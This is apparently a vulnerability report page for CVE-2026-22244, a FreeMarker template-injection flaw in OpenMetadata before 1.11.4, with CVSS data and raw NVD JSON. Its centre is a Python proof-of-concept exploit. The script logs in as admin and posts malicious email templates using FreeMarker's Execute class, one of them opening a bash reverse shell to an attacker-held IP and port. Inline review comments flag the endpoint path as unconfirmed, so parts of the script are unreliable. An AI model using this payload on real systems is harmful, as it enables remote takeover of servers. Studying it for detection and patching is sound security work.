Security Vulnerability Report
CVE-2026-22244 CVSS 7.2 HIGH

CVE-2026-22244

Published: 2026-01-08 16:16:03
Last Modified: 2026-01-15 21:14:30

Description

OpenMetadata is a unified metadata platform. Versions prior to 1.11.4 are vulnerable to remote code execution via Server-Side Template Injection (SSTI) in FreeMarker email templates. An attacker must have administrative privileges to exploit the vulnerability. Version 1.11.4 contains a patch.

CVSS Details

CVSS Score (v3.1 base score; the raw JSON below also carries a CVSS v4.0 base score of 8.5)
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:open-metadata:openmetadata:*:*:*:*:*:*:*:* - VULNERABLE
OpenMetadata < 1.11.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22244 OpenMetadata SSTI RCE PoC
# Author: Security Research
# Target: OpenMetadata < 1.11.4
# Requirement: Admin privileges
#
# NOTE(review): the advisory text on this page states only that the flaw is
# SSTI in FreeMarker email templates, that it needs administrative privileges,
# and that 1.11.4 contains the patch. The endpoint path and request fields
# used below are not confirmed by anything on the page -- treat them as
# unverified, and do not base detections on the path alone.
import requests
import json  # imported but not referenced anywhere in this script
import sys

# Placeholders only: none of these values identifies a real host or account.
TARGET_URL = "http://target:8585"  # Change to target URL
USERNAME = "admin"  # Change to admin username
PASSWORD = "admin"  # Change to admin password
ATTACKER_IP = "attacker_ip"  # Change to attacker IP
ATTACKER_PORT = "4444"  # Change to listener port


def login():
    """Authenticate to OpenMetadata and get session token.

    Posts USERNAME and PASSWORD as JSON to ``/api/v1/users/login``.

    Returns:
        A ``(session, token)`` tuple, where ``token`` is the ``accessToken``
        field of the JSON response (``None`` if the field is absent).

    On any status other than 200 the response body is printed and the
    process exits with status 1.
    """
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/v1/users/login"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    headers = {"Content-Type": "application/json"}
    # verify=False turns off TLS certificate verification for this request.
    response = session.post(login_url, json=data, headers=headers, verify=False)
    if response.status_code == 200:
        return session, response.json().get("accessToken")
    else:
        print(f"[-] Login failed: {response.text}")
        sys.exit(1)


def exploit_ssti(session, token):
    """Inject SSTI payload via email template configuration.

    Args:
        session: the ``requests.Session`` returned by ``login()``.
        token: bearer token sent in the ``Authorization`` header.

    Returns:
        True if the POST is answered with 200 or 201, False otherwise.
        A True result means only that the server accepted the request; the
        script never checks that the template was rendered or that anything
        executed, so it is not evidence that a host is vulnerable.
    """
    # Defender note: both strings below use FreeMarker's ?new() built-in to
    # instantiate freemarker.template.utility.Execute. That pairing is the
    # thing to look for in stored email-template content and request logs.
    # FreeMarker can restrict what ?new may instantiate through
    # Configuration.setNewBuiltinClassResolver (for example
    # TemplateClassResolver.SAFER_RESOLVER); whether the 1.11.4 patch takes
    # that route is not shown on this page.
    #
    # In the f-string, "{{" and "}}" are literal braces, so the resulting text
    # contains a FreeMarker ${...} interpolation.
    # Reverse shell payload for Linux
    payload = f'<#assign ex="freemarker.template.utility.Execute"?new()>${{ex("bash -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1")}}'
    # Alternative: Execute id command to verify RCE
    # NOTE(review): despite "alternative", this string is not a switch -- it is
    # placed in the "description" field of the same request body below, so
    # both template strings are sent together.
    test_payload = '<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}'
    # Target endpoint for email template configuration
    # NOTE(review): path not confirmed by the advisory text on this page.
    template_url = f"{TARGET_URL}/api/v1/email/events"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # Malicious template data
    exploit_data = {
        "name": "MaliciousTemplate",
        "description": test_payload,
        "template": payload
    }
    print(f"[*] Sending SSTI payload to {template_url}")
    # verify=False turns off TLS certificate verification for this request.
    response = session.post(template_url, json=exploit_data, headers=headers, verify=False)
    if response.status_code in [200, 201]:
        print("[+] SSTI payload sent successfully!")
        print(f"[*] Check your listener on {ATTACKER_IP}:{ATTACKER_PORT}")
        return True
    else:
        print(f"[-] Exploitation failed: {response.text}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-22244 OpenMetadata SSTI RCE Exploit")
    print("=" * 60)
    # login() exits the process on failure, so the success message below is
    # reached only after a 200 response.
    session, token = login()
    print("[+] Login successful!")
    exploit_ssti(session, token)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22244", "sourceIdentifier": "[email protected]", "published": "2026-01-08T16:16:02.647", "lastModified": "2026-01-15T21:14:29.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenMetadata is a unified metadata platform. Versions prior to 1.11.4 are vulnerable to remote code execution via Server-Side Template Injection (SSTI) in FreeMarker email templates. An attacker must have administrative privileges to exploit the vulnerability. Version 1.11.4 contains a patch."}, {"lang": "es", "value": "OpenMetadata es una plataforma unificada de metadatos. Las versiones anteriores a la 1.11.4 son vulnerables a la ejecución remota de código a través de Inyección de Plantillas del Lado del Servidor (SSTI) en plantillas de correo electrónico de FreeMarker. Un atacante debe tener privilegios administrativos para explotar la vulnerabilidad. La versión 1.11.4 contiene un parche."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open-metadata:openmetadata:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.11.4", "matchCriteriaId": "733E3727-E14A-4E3E-B2EE-538425CEFEB2"}]}]}], "references": [{"url": "https://github.com/open-metadata/OpenMetadata/commit/bffe7c45807763f9b682021d4211c478d2a08bb3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5f29-2333-h9c7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-5f29-2333-h9c7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor 
Advisory"]}]}}